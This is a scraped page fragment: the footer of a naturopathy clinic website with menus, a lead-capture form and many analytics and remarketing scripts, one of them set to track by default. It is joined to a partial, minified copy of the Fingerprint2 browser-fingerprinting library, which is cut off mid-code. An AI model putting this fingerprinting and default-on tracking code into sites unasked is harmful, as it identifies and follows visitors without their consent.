<li id="menu-item-2257" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2257"><a href="https://www.planetnaturopath.com/optimal-athlete-health/">Optimal Athlete Health</a></li> <li id="menu-item-2258" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2258"><a href="https://www.planetnaturopath.com/parasite-bacterial-infections/">Parasite and Bacterial Infections</a></li> <li id="menu-item-2259" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2259"><a href="https://www.planetnaturopath.com/small-intestinal-bacterial-overgrowth-sibo/">Small Intestinal Bacterial Overgrowth (SIBO)</a></li> <li id="menu-item-2260" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2260"><a href="https://www.planetnaturopath.com/thyroid-imbalance/">Thyroid Imbalance</a></li> <li id="menu-item-2261" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2261"><a href="https://www.planetnaturopath.com/weight-loss/">Weight Loss</a></li> <li id="menu-item-2262" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2262"><a href="https://www.planetnaturopath.com/womens-hormone-health/">Women’s Hormone Health</a></li> </ul></div></div></section> </div> <div class="clear"></div> </div> </div> <div class="fmm"> <div class="wrp"> <div class="ft-m"> <div class="menu-company-container"><ul id="menu-company" class="footer_menu"><li id="menu-item-1908" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1908"><a href="https://www.planetnaturopath.com/home/">Home</a></li> <li id="menu-item-1905" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1905"><a href="https://www.planetnaturopath.com/about-2/">About</a></li> <li id="menu-item-1906" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1906"><a href="https://www.planetnaturopath.com/blog/">Blog</a></li> <li id="menu-item-1907" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1907"><a href="https://www.planetnaturopath.com/contact-us/">Contact Us</a></li> </ul></div> </div> </div> <div class="wrp"> <div class="ft-c"> <p> Copyright 2018 by Planet Naturopath | All Rights Reserved. </p> </div> <div class="ft-s"> <span>Connect With Me:</span> <ul> <li class="fb"> <a href="https://www.facebook.com/Planet-Naturopath-316734994565/" target="_blank"></a> </li> <li class="yt"> <a href="https://www.youtube.com/channel/UCU6VtzexP7VMgiDHWPoofOg" target="_blank"></a> </li> </ul> </div> </div> <div class="clear"></div> </div> </footer> <script type="text/javascript"> var trackcmp_email = ''; var trackcmp = document.createElement("script"); trackcmp.async = true; trackcmp.type = 'text/javascript'; trackcmp.src = '//trackcmp.net/visit?actid=89057824&e='+encodeURIComponent(trackcmp_email)+'&r='+encodeURIComponent(document.referrer)+'&u='+encodeURIComponent(window.location.href); var trackcmp_s = document.getElementsByTagName("script"); if (trackcmp_s.length) { trackcmp_s[0].parentNode.appendChild(trackcmp); } else { var trackcmp_h = document.getElementsByTagName("head"); trackcmp_h.length && trackcmp_h[0].appendChild(trackcmp); } </script> <!--- START FB Button Script ----> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/en_GB/sdk.js#xfbml=1&version=v2.8&appId=1401831953471403"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <!--- END FB Button Script ----> <!-- Google Code for Remarketing Tag --> <script type="text/javascript"> /* <![CDATA[ */ var google_conversion_id = 1049981746; var google_custom_params = window.google_tag_params; var google_remarketing_only = true; /* ]]> */ </script> <script type="text/javascript" src="//www.googleadservices.com/pagead/conversion.js"> </script> <noscript> <div style="display:inline;"> <img height="1" width="1" style="border-style:none;" alt="" src="//googleads.g.doubleclick.net/pagead/viewthroughconversion/1049981746/?guid=ON&script=0"/> </div> </noscript> <!---- Location Script Show Hide For Phone Numbers At Top -----> <script type="text/javascript"> jQuery(function ($) { $.getJSON("https://freegeoip.net/json/", function(result){ if (result.country_code == "AU") { document.getElementById("hrm-pre-header").style.display = "block"; document.getElementById("pre-header-au").style.display = "block"; } else { document.getElementById("hrm-pre-header").style.display = "block"; document.getElementById("pre-header-us").style.display = "block"; }; }); }); </script><!-- The IP2Location Redirection is using IP2Location LITE geolocation database. Please visit https://lite.ip2location.com for more information. --> <script type="text/javascript">!function(e,t){for(var c=t.querySelectorAll('a[href^="#cb"]'),a=0;a<c.length;a++)c[a].addEventListener("click",function(){this.setAttribute("data-clicked",!0)});(e=t.createElement("script")).src="https://cdn.convertbox.com/convertbox/js/embed.js",e.id="app-convertbox-script",e.async=true,e.dataset.uuid="6e0100bf-2f97-4452-9207-f2f0904e19ea",document.getElementsByTagName("head")[0].appendChild(e)}(window,document);</script><script type="text/javascript"> // Set to false if opt-in required var trackByDefault = true; function acEnableTracking() { var expiration = new Date(new Date().getTime() + 1000 * 60 * 60 * 24 * 30); document.cookie = "ac_enable_tracking=1; expires= " + expiration + "; path=/"; acTrackVisit(); } function acTrackVisit() { var trackcmp_email = ''; var trackcmp = document.createElement("script"); trackcmp.async = true; trackcmp.type = 'text/javascript'; trackcmp.src = '//trackcmp.net/visit?actid=89057824&e='+encodeURIComponent(trackcmp_email)+'&r='+encodeURIComponent(document.referrer)+'&u='+encodeURIComponent(window.location.href); var trackcmp_s = document.getElementsByTagName("script"); if (trackcmp_s.length) { trackcmp_s[0].parentNode.appendChild(trackcmp); } else { var trackcmp_h = document.getElementsByTagName("head"); trackcmp_h.length && trackcmp_h[0].appendChild(trackcmp); } } if (trackByDefault || /(^|; )ac_enable_tracking=([^;]+)/.test(document.cookie)) { acEnableTracking(); } </script> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-K5JWCVN" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --><script type="text/javascript">var TVE_Event_Manager_Registered_Callbacks = TVE_Event_Manager_Registered_Callbacks || {};TVE_Event_Manager_Registered_Callbacks.thrive_lightbox = function(t,a,c){var $t=jQuery("#tve_thrive_lightbox_"+c.l_id).css("display", ""),a=c.l_anim?c.l_anim:"instant";TCB_Front.openLightbox($t,a);return false;};;</script><style type="text/css" class="tve_global_style"></style><div style="display: none" id="tve_thrive_lightbox_1526"><div class="tve_p_lb_overlay" data-style="" style=""></div><div class="tve_p_lb_content bSe cnt tcb-lp-lb" style="max-width:520px"><div class="tve_p_lb_inner" id="tve-p-scroller" style=""><article><div id="tve_flt" class="tve_flt"><div id="tve_editor" class="tve_shortcode_editor"><h2 style="color: #000; margin-top: 0;margin-bottom: 50px;font-size: 36px" class="tve_p_center"> Sign Up to Get the Guide Sent to Your Inbox! </h2> <div style="width: 90px;margin-top: 0;margin-bottom: 0;" class="thrv_wrapper tve_image_caption aligncenter"> <span class="tve_image_frame"> <a href=""> <img class="lazy lazy-hidden tve_image" src="//www.planetnaturopath.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://www.planetnaturopath.com/wp-content/plugins/thrive-visual-editor/landing-page/templates/css/images/lime-download-lightbox.png" style="width: 90px"/><noscript><img class="lazy lazy-hidden tve_image" src="//www.planetnaturopath.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://www.planetnaturopath.com/wp-content/plugins/thrive-visual-editor/landing-page/templates/css/images/lime-download-lightbox.png" style="width: 90px"/><noscript><img class="tve_image" src="https://www.planetnaturopath.com/wp-content/plugins/thrive-visual-editor/landing-page/templates/css/images/lime-download-lightbox.png" style="width: 90px"/></noscript></noscript> </a> </span> </div> <div class="thrv_wrapper thrv_lead_generation tve_clearfix tve_green tve_3 thrv_lead_generation_vertical" data-inputs-count="3" data-tve-style="1" style="margin-bottom:18px"> <div class="thrv_lead_generation_code" style="display: none;"></div> <div class="thrv_lead_generation_container tve_clearfix"> <div class="tve_lead_generated_inputs_container tve_clearfix"> <div class="tve_lead_fields_overlay"></div> <div class=" tve_lg_input_container tve_lg_3 tve_lg_input"> <input type="text" data-placeholder="Full Name" placeholder="Full Name" value="" name="first_name"/> </div> <div class="tve_lg_input_container tve_lg_3 tve_lg_input"> <input type="text" data-placeholder="Email" placeholder="Email" value="" name="email"/> </div> <div class="tve_lg_input_container tve_submit_container tve_lg_3 tve_lg_submit"> <button type="Submit">Download ebook</button> </div> </div> </div> </div></div></div><div class="tcb_flag" style="display: none"></div> </article></div><a href="javascript:void(0)" class="tve_p_lb_close" style="" title="Close">x</a></div></div><script type='text/javascript' src='https://www.planetnaturopath.com/wp-content/plugins/fitvids-for-wordpress/jquery.fitvids.js?v=1.0.0'></script> <script type='text/javascript' src='https://www.planetnaturopath.com/wp-content/plugins/responsive-youtube-vimeo-popup/assets/js/wp-video-popup.js?ver=5.2'></script> <script type='text/javascript' src='https://www.planetnaturopath.com/wp-content/plugins/table-of-contents-plus/front.min.js?ver=1509'></script> <script type='text/javascript' src='https://www.planetnaturopath.com/wp-includes/js/imagesloaded.min.js?ver=3.2.0'></script> <script type='text/javascript' src='https://www.planetnaturopath.com/wp-includes/js/masonry.min.js?ver=3.3.2'></script> <script type='text/javascript' src='https://www.planetnaturopath.com/wp-includes/js/jquery/jquery.masonry.min.js?v=1.0.0'></script> <script type='text/javascript'> /* <![CDATA[ */ var tve_frontend_options = {"ajaxurl":"https:\/\/www.planetnaturopath.com\/wp-admin\/admin-ajax.php","is_editor_page":"","page_events":[],"is_single":"1","social_fb_app_id":"","dash_url":"https:\/\/www.planetnaturopath.com\/wp-content\/plugins\/thrive-visual-editor\/thrive-dashboard","translations":{"Copy":"Copy"},"post_id":"4607"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.planetnaturopath.com/wp-content/plugins/thrive-visual-editor/editor/js/dist/frontend.min.js?ver=2.2.0.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var ThriveApp = {"ajax_url":"https:\/\/www.planetnaturopath.com\/wp-admin\/admin-ajax.php","is_singular":"1","post_type":"page","lazy_load_comments":"0","comments_loaded":"0","theme_uri":"https:\/\/www.planetnaturopath.com\/wp-content\/themes\/rise","translations":{"ProductDetails":"Product Details"}}; /* ]]> */ </script> <script type='text/javascript' src='https://www.planetnaturopath.com/wp-content/themes/rise/js/script.js?v=1.0.0'></script> <script type='text/javascript'> /* <![CDATA[ */ var tve_dash_front = {"ajaxurl":"https:\/\/www.planetnaturopath.com\/wp-admin\/admin-ajax.php","force_ajax_send":"","is_crawler":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.planetnaturopath.com/wp-content/plugins/thrive-visual-editor/thrive-dashboard/js/dist/frontend.min.js?ver=2.1.6'></script> <script type='text/javascript'> /* <![CDATA[ */ var a3_lazyload_params = {"apply_images":"1","apply_videos":"1"}; /* ]]> */ </script> <script type='text/javascript' src='//www.planetnaturopath.com/wp-content/plugins/a3-lazy-load/assets/js/jquery.lazyloadxt.extra.min.js?v=1.0.0'></script> <script type='text/javascript' src='//www.planetnaturopath.com/wp-content/plugins/a3-lazy-load/assets/js/jquery.lazyloadxt.srcset.min.js?v=1.0.0'></script> <script type='text/javascript'> /* <![CDATA[ */ var a3_lazyload_extend_params = {"edgeY":"600"}; /* ]]> */ </script> <script type='text/javascript' src='//www.planetnaturopath.com/wp-content/plugins/a3-lazy-load/assets/js/jquery.lazyloadxt.extend.js?v=1.0.0'></script> <script type='text/javascript' src='https://www.planetnaturopath.com/wp-includes/js/wp-embed.min.js?ver=5.2'></script> <script type="text/javascript"> jQuery(document).ready(function () { jQuery('body').fitVids(); }); </script><script type="text/javascript">/*<![CDATA[*/if ( !window.TL_Const ) {var TL_Const={"security":"e642043723","ajax_url":"https:\/\/www.planetnaturopath.com\/wp-admin\/admin-ajax.php","forms":[],"action_conversion":"tve_leads_ajax_conversion","action_impression":"tve_leads_ajax_impression","ajax_load":1,"custom_post_data":[],"current_screen":{"screen_type":1,"screen_id":0},"ignored_fields":["email","_captcha_size","_captcha_theme","_captcha_type","_submit_option","_use_captcha","g-recaptcha-response","__tcb_lg_fc","__tcb_lg_msg","_state","_form_type","_error_message_option","_back_url","_submit_option","url","_asset_group","_asset_option","mailchimp_optin"]};} else {ThriveGlobal.$j.extend(true, TL_Const, {"security":"e642043723","ajax_url":"https:\/\/www.planetnaturopath.com\/wp-admin\/admin-ajax.php","forms":[],"action_conversion":"tve_leads_ajax_conversion","action_impression":"tve_leads_ajax_impression","ajax_load":1,"custom_post_data":[],"current_screen":{"screen_type":1,"screen_id":0},"ignored_fields":["email","_captcha_size","_captcha_theme","_captcha_type","_submit_option","_use_captcha","g-recaptcha-response","__tcb_lg_fc","__tcb_lg_msg","_state","_form_type","_error_message_option","_back_url","_submit_option","url","_asset_group","_asset_option","mailchimp_optin"]})} /*]]> */</script><script type="text/javascript"> (function(d, src, c) { var t=d.scripts[d.scripts.length - 1],s=d.createElement('script');s.id='la_x2s6df8d';s.async=true;s.src=src;s.onload=s.onreadystatechange=function(){var rs=this.readyState;if(rs&&(rs!='complete')&&(rs!='loaded')){return;}c(this);};t.parentElement.insertBefore(s,t.nextSibling);})(document, '//planetnaturopath.ladesk.com/scripts/track.js', function(e){ LiveAgent.createButton('2ec54f2b', e); }); </script><div class="essb_mailform"><div class="essb_mailform_content"><p>Send this to a friend</p><label class="essb_mailform_content_label">Your email</label><input type="text" id="essb_mailform_from" class="essb_mailform_content_input" placeholder="Your email"/><label class="essb_mailform_content_label">Recipient email</label><input type="text" id="essb_mailform_to" class="essb_mailform_content_input" placeholder="Recipient email"/><div class="essb_mailform_content_buttons"><button id="essb_mailform_btn_submit" class="essb_mailform_content_button" onclick="essb_mailform_send();">Send</button><button id="essb_mailform_btn_cancel" class="essb_mailform_content_button" onclick="essb_close_mailform(); return false;">Cancel</button></div><input type="hidden" id="essb_mail_salt" value="1583755167"/><input type="hidden" id="essb_mail_instance" value=""/><input type="hidden" id="essb_mail_post" value=""/></div></div><div class="essb_mailform_shadow"></div><link rel='stylesheet' id='essb-compiled-css' href='https://www.planetnaturopath.com/wp-content/easysocialsharebuttons-assets/compiled/2566c291e59e185c12a331fef1e235f3.css' type='text/css' media='all' /><script type='text/javascript' src='https://www.planetnaturopath.com/wp-content/easysocialsharebuttons-assets/compiled/2566c291e59e185c12a331fef1e235f3.js' async></script></div> </body> </html>
1
!function(e,t,i){"use strict";t[e]=i()}("Fingerprint2",this,function(){"use strict";Array.prototype.indexOf||(Array.prototype.indexOf=function(e,t){var i;if(null==this)throw new TypeError("'this' is null or undefined");var a=Object(this),r=a.length>>>0;if(0===r)return-1;var n=+t||0;if(Math.abs(n)===1/0&&(n=0),n>=r)return-1;for(i=Math.max(n>=0?n:r-Math.abs(n),0);i<r;){if(i in a&&a[i]===e)return i;i++}return-1});var e=function(t){if(!(this instanceof e))return new e(t);var i={swfContainerId:"fingerprintjs2",swfPath:"flash/compiled/FontList.swf",detectScreenOrientation:!0,sortPluginsFor:[/palemoon/i],userDefinedFonts:[]};this.options=this.extend(t,i),this.nativeForEach=Array.prototype.forEach,this.nativeMap=Array.prototype.map};return e.prototype={extend:function(e,t){if(null==e)return t;for(var i in e)null!=e[i]&&t[i]!==e[i]&&(t[i]=e[i]);return t},log:function(e){window.console&&console.log(e)},get:function(e){var t=[];t=this.userAgentKey(t),t=this.languageKey(t),t=this.colorDepthKey(t),t=this.pixelRatioKey(t),t=this.screenResolutionKey(t),t=this.availableScreenResolutionKey(t),t=this.timezoneOffsetKey(t),t=this.sessionStorageKey(t),t=this.localStorageKey(t),t=this.indexedDbKey(t),t=this.addBehaviorKey(t),t=this.openDatabaseKey(t),t=this.cpuClassKey(t),t=this.platformKey(t),t=this.doNotTrackKey(t),t=this.pluginsKey(t),t=this.canvasKey(t),t=this.webglKey(t),t=this.adBlockKey(t),t=this.hasLiedLanguagesKey(t),t=this.hasLiedResolutionKey(t),t=this.hasLiedOsKey(t),t=this.hasLiedBrowserKey(t),t=this.touchSupportKey(t);var i=this;this.fontsKey(t,function(t){var a=[];i.each(t,function(e){var t=e.value;"undefined"!=typeof e.value.join&&(t=e.value.join(";")),a.push(t)});var r=i.x64hash128(a.join("~~~"),31);return e(r,t)})},userAgentKey:function(e){return this.options.excludeUserAgent||e.push({key:"user_agent",value:this.getUserAgent()}),e},getUserAgent:function(){return navigator.userAgent},languageKey:function(e){return this.options.excludeLanguage||e.push({key:"language",value:navigator.language||navigator.userLanguage||navigator.browserLanguage||navigator.systemLanguage||""}),e},colorDepthKey:function(e){return this.options.excludeColorDepth||e.push({key:"color_depth",value:screen.colorDepth||-1}),e},pixelRatioKey:function(e){return this.options.excludePixelRatio||e.push({key:"pixel_ratio",value:this.getPixelRatio()}),e},getPixelRatio:function(){return window.devicePixelRatio||""},screenResolutionKey:function(e){return this.options.excludeScreenResolution?e:this.getScreenResolution(e)},getScreenResolution:function(e){var t;return t=this.options.detectScreenOrientation&&screen.height>screen.width?[screen.height,screen.width]:[screen.width,screen.height],"undefined"!=typeof t&&e.push({key:"resolution",value:t}),e},availableScreenResolutionKey:function(e){return this.options.excludeAvailableScreenResolution?e:this.getAvailableScreenResolution(e)},getAvailableScreenResolution:function(e){var t;return screen.availWidth&&screen.availHeight&&(t=this.options.detectScreenOrientation?screen.availHeight>screen.availWidth?[screen.availHeight,screen.availWidth]:[screen.availWidth,screen.availHeight]:[screen.availHeight,screen.availWidth]),"undefined"!=typeof t&&e.push({key:"available_resolution",value:t}),e},timezoneOffsetKey:function(e){return this.options.excludeTimezoneOffset||e.push({key:"timezone_offset",value:(new Date).getTimezoneOffset()}),e},sessionStorageKey:function(e){return!this.options.excludeSessionStorage&&this.hasSessionStorage()&&e.push({key:"session_storage",value:1}),e},localStorageKey:function(e){return!this.options.excludeSessionStorage&&this.hasLocalStorage()&&e.push({key:"local_storage",value:1}),e},indexedDbKey:function(e){return!this.options.excludeIndexedDB&&this.hasIndexedDB()&&e.push({key:"indexed_db",value:1}),e},addBehaviorKey:function(e){return document.body&&!this.options.excludeAddBehavior&&document.body.addBehavior&&e.push({key:"add_behavior",value:1}),e},openDatabaseKey:function(e){return!this.options.excludeOpenDatabase&&window.openDatabase&&e.push({key:"open_database",value:1}),e},cpuClassKey:function(e){return this.options.excludeCpuClass||e.push({key:"cpu_class",value:this.getNavigatorCpuClass()}),e},platformKey:function(e){return this.options.excludePlatform||e.push({key:"navigator_platform",value:this.getNavigatorPlatform()}),e},doNotTrackKey:function(e){return this.options.excludeDoNotTrack||e.push({key:"do_not_track",value:this.getDoNotTrack()}),e},canvasKey:function(e){return!this.options.excludeCanvas&&this.isCanvasSupported()&&e.push({key:"canvas",value:this.getCanvasFp()}),e},webglKey:function(e){return this.options.excludeWebGL?e:this.isWebGlSupported()?(e.push({key:"webgl",value:this.getWebglFp()}),e):e},adBlockKey:function(e){return this.options.excludeAdBlock||e.push({key:"adblock",value:this.getAdBlock()}),e},hasLiedLanguagesKey:function(e){return this.options.excludeHasLiedLanguages||e.push({key:"has_lied_languages",value:this.getHasLiedLanguages()}),e},hasLiedResolutionKey:function(e){return this.options.excludeHasLiedResolution||e.push({key:"has_lied_resolution",value:this.getHasLiedResolution()}),e},hasLiedOsKey:function(e){return this.options.excludeHasLiedOs||e.push({key:"has_lied_os",value:this.getHasLiedOs()}),e},hasLiedBrowserKey:function(e){return this.options.excludeHasLiedBrowser||e.push({key:"has_lied_browser",value:this.getHasLiedBrowser()}),e},fontsKey:function(e,t){return this.options.excludeJsFonts?this.flashFontsKey(e,t):this.jsFontsKey(e,t)},flashFontsKey:function(e,t){return this.options.excludeFlashFonts?t(e):this.hasSwfObjectLoaded()&&this.hasMinFlashInstalled()?"undefined"==typeof this.options.swfPath?t(e):void this.loadSwfAndDetectFonts(function(i){e.push({key:"swf_fonts",value:i.join(";")}),t(e)}):t(e)},jsFontsKey:function(e,t){var i=this;return setTimeout(function(){var a=["monospace","sans-serif","serif"],r=["Andale Mono","Arial","Arial Black","Arial Hebrew","Arial MT","Arial Narrow","Arial Rounded MT Bold","Arial Unicode MS","Bitstream Vera Sans Mono","Book Antiqua","Bookman Old Style","Calibri","Cambria","Cambria Math","Century","Century Gothic","Century Schoolbook","Comic Sans","Comic Sans MS","Consolas","Courier","Courier New","Garamond","Geneva","Georgia","Helvetica","Helvetica Neue","Impact","Lucida Bright","Lucida Calligraphy","Lucida Console","Lucida Fax","LUCIDA GRANDE","Lucida Handwriting","Lucida Sans","Lucida Sans Typewriter","Lucida Sans Unicode","Microsoft Sans Serif","Monaco","Monotype Corsiva","MS Gothic","MS Outlook","MS PGothic","MS Reference Sans Serif","MS Sans Serif","MS Serif","MYRIAD","MYRIAD PRO","Palatino","Palatino Linotype","Segoe Print","Segoe Script","Segoe UI","Segoe UI Light","Segoe UI Semibold","Segoe UI Symbol","Tahoma","Times","Times New Roman","Times New Roman PS","Trebuchet MS","Verdana","Wingdings","Wingdings 2","Wingdings 3"],n=["Abadi MT Condensed Light","Academy Engraved LET","ADOBE CASLON PRO","Adobe Garamond","ADOBE GARAMOND PRO","Agency FB","Aharoni","Albertus Extra Bold","Albertus Medium","Algerian","Amazone BT","American Typewriter","American Typewriter Condensed","AmerType Md BT","Andalus","Angsana New","AngsanaUPC","Antique Olive","Aparajita","Apple Chancery","Apple Color Emoji","Apple SD Gothic Neo","Arabic Typesetting","ARCHER","ARNO PRO","Arrus BT","Aurora Cn BT","AvantGarde Bk BT","AvantGarde Md BT","AVENIR","Ayuthaya","Bandy","Bangla Sangam MN","Bank Gothic","BankGothic Md BT","Baskerville","Baskerville Old Face","Batang","BatangChe","Bauer Bodoni","Bauhaus 93","Bazooka","Bell MT","Bembo","Benguiat Bk BT","Berlin Sans FB","Berlin Sans FB Demi","Bernard MT Condensed","BernhardFashion BT","BernhardMod BT","Big Caslon","BinnerD","Blackadder ITC","BlairMdITC TT","Bodoni 72","Bodoni 72 Oldstyle","Bodoni 72 Smallcaps","Bodoni MT","Bodoni MT Black","Bodoni MT Condensed","Bodoni MT Poster Compressed","Bookshelf Symbol 7","Boulder","Bradley Hand","Bradley Hand ITC","Bremen Bd BT","Britannic Bold","Broadway","Browallia New","BrowalliaUPC","Brush Script MT","Californian FB","Calisto MT","Calligrapher","Candara","CaslonOpnface BT","Castellar","Centaur","Cezanne","CG Omega","CG Times","Chalkboard","Chalkboard SE","Chalkduster","Charlesworth","Charter Bd BT","Charter BT","Chaucer","ChelthmITC Bk BT","Chiller","Clarendon","Clarendon Condensed","CloisterBlack BT","Cochin","Colonna MT","Constantia","Cooper Black","Copperplate","Copperplate Gothic","Copperplate Gothic Bold","Copperplate Gothic Light","CopperplGoth Bd BT","Corbel","Cordia New","CordiaUPC","Cornerstone","Coronet","Cuckoo","Curlz MT","DaunPenh","Dauphin","David","DB LCD Temp","DELICIOUS","Denmark","DFKai-SB","Didot","DilleniaUPC","DIN","DokChampa","Dotum","DotumChe","Ebrima","Edwardian Script ITC","Elephant","English 111 Vivace BT","Engravers MT","EngraversGothic BT","Eras Bold ITC","Eras Demi ITC","Eras Light ITC","Eras Medium ITC","EucrosiaUPC","Euphemia","Euphemia UCAS","EUROSTILE","Exotc350 Bd BT","FangSong","Felix Titling","Fixedsys","FONTIN","Footlight MT Light","Forte","FrankRuehl","Fransiscan","Freefrm721 Blk BT","FreesiaUPC","Freestyle Script","French Script MT","FrnkGothITC Bk BT","Fruitger","FRUTIGER","Futura","Futura Bk BT","Futura Lt BT","Futura Md BT","Futura ZBlk BT","FuturaBlack BT","Gabriola","Galliard BT","Gautami","Geeza Pro","Geometr231 BT","Geometr231 Hv BT","Geometr231 Lt BT","GeoSlab 703 Lt BT","GeoSlab 703 XBd BT","Gigi","Gill Sans","Gill Sans MT","Gill Sans MT Condensed","Gill Sans MT Ext Condensed Bold","Gill Sans Ultra Bold","Gill Sans Ultra Bold Condensed","Gisha","Gloucester MT Extra Condensed","GOTHAM","GOTHAM BOLD","Goudy Old Style","Goudy Stout","GoudyHandtooled BT","GoudyOLSt BT","Gujarati Sangam MN","Gulim","GulimChe","Gungsuh","GungsuhChe","Gurmukhi MN","Haettenschweiler","Harlow Solid Italic","Harrington","Heather","Heiti SC","Heiti TC","HELV","Herald","High Tower Text","Hiragino Kaku Gothic ProN","Hiragino Mincho ProN","Hoefler Text","Humanst 521 Cn BT","Humanst521 BT","Humanst521 Lt BT","Imprint MT Shadow","Incised901 Bd BT","Incised901 BT","Incised901 Lt BT","INCONSOLATA","Informal Roman","Informal011 BT","INTERSTATE","IrisUPC","Iskoola Pota","JasmineUPC","Jazz LET","Jenson","Jester","Jokerman","Juice ITC","Kabel Bk BT","Kabel Ult BT","Kailasa","KaiTi","Kalinga","Kannada Sangam MN","Kartika","Kaufmann Bd BT","Kaufmann BT","Khmer UI","KodchiangUPC","Kokila","Korinna BT","Kristen ITC","Krungthep","Kunstler Script","Lao UI","Latha","Leelawadee","Letter Gothic","Levenim MT","LilyUPC","Lithograph","Lithograph Light","Long Island","Lydian BT","Magneto","Maiandra GD","Malayalam Sangam MN","Malgun Gothic","Mangal","Marigold","Marion","Marker Felt","Market","Marlett","Matisse ITC","Matura MT Script Capitals","Meiryo","Meiryo UI","Microsoft Himalaya","Microsoft JhengHei","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Uighur","Microsoft YaHei","Microsoft Yi Baiti","MingLiU","MingLiU_HKSCS","MingLiU_HKSCS-ExtB","MingLiU-ExtB","Minion","Minion Pro","Miriam","Miriam Fixed","Mistral","Modern","Modern No. 20","Mona Lisa Solid ITC TT","Mongolian Baiti","MONO","MoolBoran","Mrs Eaves","MS LineDraw","MS Mincho","MS PMincho","MS Reference Specialty","MS UI Gothic","MT Extra","MUSEO","MV Boli","Nadeem","Narkisim","NEVIS","News Gothic","News GothicMT","NewsGoth BT","Niagara Engraved","Niagara Solid","Noteworthy","NSimSun","Nyala","OCR A Extended","Old Century","Old English Text MT","Onyx","Onyx BT","OPTIMA","Oriya Sangam MN","OSAKA","OzHandicraft BT","Palace Script MT","Papyrus","Parchment","Party LET","Pegasus","Perpetua","Perpetua Titling MT","PetitaBold","Pickwick","Plantagenet Cherokee","Playbill","PMingLiU","PMingLiU-ExtB","Poor Richard","Poster","PosterBodoni BT","PRINCETOWN LET","Pristina","PTBarnum BT","Pythagoras","Raavi","Rage Italic","Ravie","Ribbon131 Bd BT","Rockwell","Rockwell Condensed","Rockwell Extra Bold","Rod","Roman","Sakkal Majalla","Santa Fe LET","Savoye LET","Sceptre","Script","Script MT Bold","SCRIPTINA","Serifa","Serifa BT","Serifa Th BT","ShelleyVolante BT","Sherwood","Shonar Bangla","Showcard Gothic","Shruti","Signboard","SILKSCREEN","SimHei","Simplified Arabic","Simplified Arabic Fixed","SimSun","SimSun-ExtB","Sinhala Sangam MN","Sketch Rockwell","Skia","Small Fonts","Snap ITC","Snell Roundhand","Socket","Souvenir Lt BT","Staccato222 BT","Steamer","Stencil","Storybook","Styllo","Subway","Swis721 BlkEx BT","Swiss911 XCm BT","Sylfaen","Synchro LET","System","Tamil Sangam MN","Technical","Teletype","Telugu Sangam MN","Tempus Sans ITC","Terminal","Thonburi","Traditional Arabic","Trajan","TRAJAN PRO","Tristan","Tubular","Tunga","Tw Cen MT","Tw Cen MT Condensed","Tw Cen MT Condensed Extra Bold","TypoUpright BT","Unicorn","Univers","Univers CE 55 Medium","Univers Condensed","Utsaah","Vagabond","Vani","Vijaya","Viner Hand ITC","VisualUI","Vivaldi","Vladimir Script","Vrinda","Westminster","WHITNEY","Wide Latin","ZapfEllipt BT","ZapfHumnst BT","ZapfHumnst Dm BT","Zapfino","Zurich BlkEx BT","Zurich Ex BT","ZWAdobeF"];i.options.extendedJsFonts&&(r=r.concat(n)),r=r.concat(i.options.userDefinedFonts);var o="mmmmmmmmmmlli",s="72px",l=document.getElementsByTagName("body")[0],h=document.createElement("div"),u=document.createElement("div"),d={},c={},g=function(){var e=document.createElement("span");return e.style.position="absolute",e.style.left="-9999px",e.style.fontSize=s,e.style.lineHeight="normal",e.innerHTML=o,e},p=function(e,t){var i=g();return i.style.fontFamily="'"+e+"',"+t,i},f=function(){for(var e=[],t=0,i=a.length;t<i;t++){var r=g();r.style.fontFamily=a[t],h.appendChild(r),e.push(r)}return e},m=function(){for(var e={},t=0,i=r.length;t<i;t++){for(var n=[],o=0,s=a.length;o<s;o++){var l=p(r[t],a[o]);u.appendChild(l),n.push(l)}e[r[t]]=n}return e},T=function(e){for(var t=!1,i=0;i<a.length;i++)if(t=e[i].offsetWidth!==d[a[i]]||e[i].offsetHeight!==c[a[i]])return t;return t},S=f();l.appendChild(h);for(var x=0,v=a.length;x<v;x++)d[a[x]]=S[x].offsetWidth,c[a[x]]=S[x].offsetHeight;var M=m();l.appendChild(u);for(var A=[],E=0,y=r.length;E<y;E++)T(M[r[E]])&&A.push(r[E]);l.removeChild(u),l.removeChild(h),e.push({key:"js_fonts",value:A}),t(e)},1)},pluginsKey:function(e){return this.options.excludePlugins||(this.isIE()?this.options.excludeIEPlugins||e.push({key:"ie_plugins",value:this.getIEPlugins()}):e.push({key:"regular_plugins",value:this.getRegularPlugins()})),e},getRegularPlugins:function(){for(var e=[],t=0,i=navigator.plugins.length;t<i;t++)e.push(navigator.plugins[t]);return this.pluginsShouldBeSorted()&&(e=e.sort(function(e,t){return e.name>t.name?1:e.name<t.name?-1:0})),this.map(e,function(e){var t=this.map(e,function(e){return[e.type,e.suffixes].join("~")}).join(",");return[e.name,e.description,t].join("::")},this)},getIEPlugins:function(){var e=[];if(Object.getOwnPropertyDescriptor&&Object.getOwnPropertyDescriptor(window,"ActiveXObject")||"ActiveXObject"in window){var 